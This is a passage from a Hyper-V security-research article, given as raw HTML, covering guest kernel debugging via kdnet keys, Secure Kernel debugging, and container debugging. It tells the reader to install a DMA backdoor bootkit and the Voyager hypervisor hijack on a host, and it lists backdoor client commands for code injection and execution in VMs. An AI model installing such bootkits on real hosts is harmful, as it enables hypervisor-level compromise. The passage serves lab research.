style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 18pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">For getting guest OS debugging option you need guest OS kernel dump:</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 18pt; margin-top: 0pt; text-align: center;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 70px; overflow: hidden; width: 473px;"><img height="70" src="https://lh6.googleusercontent.com/HZ3NlcnAo5GKk7lq13nvYjamgf_DxZ4Pr5VDJdtXsM8O6ZZZLTpOKYIvk6lTEHKzpab54NR9QTvQ1YDfV4K0B-QWsWreWsomPHM8XIEHXwin_WfLg2Yhy3fzfowemH8DYutAKlCPbO8EJxc9HQ" style="margin-left: 0px; margin-top: 0px;" width="473" /></span></span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 18pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Go to Windows device portal – Debug. Download live kernel dump and open it in WinDBG </span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 18pt; margin-top: 0pt; text-align: center;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 159px; overflow: hidden; width: 249px;"><img height="159" src="https://lh3.googleusercontent.com/mMyLxLcDuglmVetogRsswL9Rzn6FXTaNvXGvSYfHYNySa5Uz2PCpkxnICrX2V6crsLEIZwxAgO7YzA3Qdf6oUOPHNWjx2cNAvk-lUzzNGBzgjyS3PC1xh2ooqfnzlUj_IfsY6o1IpI-aZy-I5w" style="margin-left: 0px; margin-top: 0px;" width="249" /></span></span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 18pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">And run </span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">decypher_kdnet_key.py</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> script. Script found kdnet parameters from offset and cyphered it to base36 format</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 18pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Finally, we get current kdnet debugging settings:</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 18pt; margin-top: 0pt; text-align: center;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 71px; overflow: hidden; width: 442px;"><img height="71" src="https://lh6.googleusercontent.com/s7fCVhJkOvcp4H-TtlWDTRHk0ICILCJzWErQzYrC0nZ7pYiiMFg_UO9iwms9iFCT_9tgy3IPVss3h8xSLE0rex9nHxH2_pg78OsApPDkyAt0VcTsmOg285qYJgtc8fV8UjuWJvmHCtv0IatquQ" style="margin-left: 0px; margin-top: 0px;" width="442" /></span></span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 18pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Next, launch WinDBG, using string:</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 18pt; margin-top: 0pt; text-align: justify; text-indent: 17.4pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">windbgx.exe -k net:port=50005,key=2k85xmoorkrbx.u7xg1f35gwi4.24033ib08wzhs.2o8xly2z2ik5y</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 18pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">you attached to Host OS:</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 18pt; margin-top: 0pt; text-align: center;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 193px; overflow: hidden; width: 430px;"><img height="193" src="https://lh6.googleusercontent.com/ukHAl9myTFSHoURJ5Qre3YyZIBv6uO3xZnHsEOVopDQL2_u8XUZEgxaybL601q5Gppt2Qs5R5m63weHh_IM66VkBLSUWSJgdTwVJUo0UCKitow2fj7oAqsseiRmFhar5hpMudXvG_g2Q-0Fo_Q" style="margin-left: 0px; margin-top: 0px;" width="430" /></span></span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 18pt; margin-top: 0pt; padding: 0pt 0pt 0pt 18pt; text-align: justify; text-indent: -18pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">2.6.</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;"> Debugging Hyper-V on physical host</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 18pt; margin-top: 0pt; text-align: justify; text-indent: 17.4pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">There are researches from @d_olex and @_xeroxz. They replace some boot files and intercept Hyper-V loader processes. </span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Download latest build from </span><a href="https://github.com/Cr4sh/s6_pcie_microblaze/tree/master/python/payloads/DmaBackdoorHv%20and%20run%20bootkit_installer.ps1" style="text-decoration: none;"><span face="Calibri,sans-serif" style="-webkit-text-decoration-skip: none; background-color: transparent; color: #0563c1; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration-skip-ink: none; text-decoration: underline; vertical-align: baseline;">https://github.com/Cr4sh/s6_pcie_microblaze/tree/master/python/payloads/DmaBackdoorHv</span></a><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">, and simply run </span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">bootkit_installer.ps1</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> in host OS (tested on Windows Server 2019 inside VMware Workstation).</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 18pt; margin-top: 0pt; text-align: center;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 326px; overflow: hidden; width: 328px;"><img height="326" src="https://lh4.googleusercontent.com/JMKpdT3jPUSKZCSsQNemlb2j2zqHL5CkBa11R7xqKpYiCBxvyTrSLpx_fZ5bx2oQ5zI6rw3PZ0P7_IYY3hzBpb9uxtFHGLPo2TuFjOlu_S_WWGeJaxIieRiWw1LKXFMwgOXvs1Xfqsmm21M1hw" style="margin-left: 0px; margin-top: 0px;" width="328" /></span></span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 18pt; margin-top: 0pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">reboot Host OS and see:</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 18pt; margin-top: 0pt; text-align: center;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 223px; overflow: hidden; width: 296px;"><img height="223" src="https://lh5.googleusercontent.com/TG21nOWxPd6ppRMEzoP5C6Gwreb5d806-Vq0chuv6BXArj4P6oVzDaY2RrbRIB5NCJ_7PB_Uynwo3Up-3xDApaNyJznhHzEF6vW85lX5Eq38GtBXa6CkTFwwsIaMkuQj6WycAJ0laqRJx6RvFg" style="margin-left: 0px; margin-top: 0px;" width="296" /></span></span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 18pt; margin-top: 0pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">In guest OS we can run </span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">backdoor_client.exe</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> and see many of Hyper-V internals information:</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 18pt; margin-top: 0pt; text-align: center;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 400px; overflow: hidden; width: 300px;"><img height="400" src="https://lh6.googleusercontent.com/4UzDOj_lxyxFOa0JyfSnZNfg-8yZx_eXo7UT0L1jD60pPfnyV9lyF_Uz0jW_c9FaJrZQ6CReYFC201QCELLU5LUB24TYvL-NXXvZajbdv1cNEJHPGoo3OGv9VDcO0lUaQNd-F7RpGY0f3n9eFw" style="margin-left: 0px; margin-top: 0px;" width="300" /></span></span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 18pt; margin-top: 0pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Current commands are supporting:</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">--debug</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">--virt-read</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">--virt-translate</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">--phys-read</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">--phys-translate</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">--idt</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">--vmcs</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">--ept-list</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">--ept-dump</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">--sk-info</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">--sk-ps</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">--sk-debug-enable</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">--sk-inject</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">--vm-inject</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">--vm-exec</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 18pt; margin-top: 0pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">You can download Voyager from </span><a href="https://githacks.org/_xeroxz/voyager" style="text-decoration: none;"><span face="Calibri,sans-serif" style="-webkit-text-decoration-skip: none; background-color: transparent; color: #0563c1; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration-skip-ink: none; text-decoration: underline; vertical-align: baseline;">https://githacks.org/_xeroxz/voyager</span></a><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">. It doesn’t contain binaries (at article write time), and you need compile it first for special platform and run launch.bat. After rebooting you see:</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 18pt; margin-top: 0pt; text-align: center;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 272px; overflow: hidden; width: 290px;"><img height="272" src="https://lh5.googleusercontent.com/dbNgis6klQS7hr0mytDcGUzCjWx53znvtfZ-_R3EBggH_mhfOhJlaQfhbWwwQhjlv2mEDnvz4iybNBwMji5DeZo__IQo9XT061vJnQXNESP21mVEoe03acKT01Z02sLpauhT0xDjXFd-Sx4n_A" style="margin-left: 0px; margin-top: 0px;" width="290" /></span></span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 18pt; margin-top: 0pt; text-indent: 17.4pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">You can run example.exe inside guest VM:</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 18pt; margin-top: 0pt; text-align: center;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 157px; overflow: hidden; width: 301px;"><img height="157" src="https://lh6.googleusercontent.com/xg6HLawHjnYlEbgRpbjwmIka-GrqHK-B8qiefK_EXnOCC4OiJCtUXfF4DSShruSAaMmSHCmhkaXWfrLAUd-RzrL0Gw8A5fFjagSEsHr-8G2oj-3mR32_7n-ySJxskUIep1sYxgb77Haq58nJFg" style="margin-left: 0px; margin-top: 0px;" width="301" /></span></span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 18pt; margin-top: 0pt; text-indent: 17.4pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Probably, we see more examples in future.</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 18pt; margin-top: 0pt; padding: 0pt 0pt 0pt 18pt; text-align: center; text-indent: -18pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">2.7.</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Securekernel debugging</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">LiveCloudKd EXDi module can be used for debugging Hyper-V guest OS without enable kernel debugging in bootloader. Instructions available on module page:</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt;"><a href="https://github.com/gerhart01/LiveCloudKd/blob/master/ExdiKdSample/LiveDebugging.md" style="text-decoration: none;"><span face="Calibri,sans-serif" style="-webkit-text-decoration-skip: none; background-color: transparent; color: #0563c1; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration-skip-ink: none; text-decoration: underline; vertical-align: baseline;">https://github.com/gerhart01/LiveCloudKd/blob/master/ExdiKdSample/LiveDebugging.md</span></a></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Another method was described by @commial:</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt;"><a href="https://github.com/commial/experiments/tree/master/debugging-secure-kernel" style="text-decoration: none;"><span face="Calibri,sans-serif" style="-webkit-text-decoration-skip: none; background-color: transparent; color: #0563c1; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration-skip-ink: none; text-decoration: underline; vertical-align: baseline;">https://github.com/commial/experiments/tree/master/debugging-secure-kernel</span></a></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 18pt; margin-top: 0pt; padding: 0pt 0pt 0pt 18pt; text-align: center; text-indent: -18pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">2.8.</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Hyper-V container debugging</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">LiveCloudKd EXDi plugin can be used too, but it is better to switch Hyper-V scheduler to classic:</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">bcdedit /set hypervisorschedulertype classic</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">debugging instructions can be seen</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><a href="https://github.com/gerhart01/LiveCloudKd/blob/master/ExdiKdSample/LiveDebugging.md" style="text-decoration: none;"><span face="Calibri,sans-serif" style="-webkit-text-decoration-skip: none; background-color: transparent; color: #0563c1; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration-skip-ink: none; text-decoration: underline; vertical-align: baseline;">https://github.com/gerhart01/LiveCloudKd/blob/master/ExdiKdSample/LiveDebugging.md</span></a></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 18pt; margin-top: 0pt; padding: 0pt 0pt 0pt 18pt; text-align: center; text-indent: -18pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; 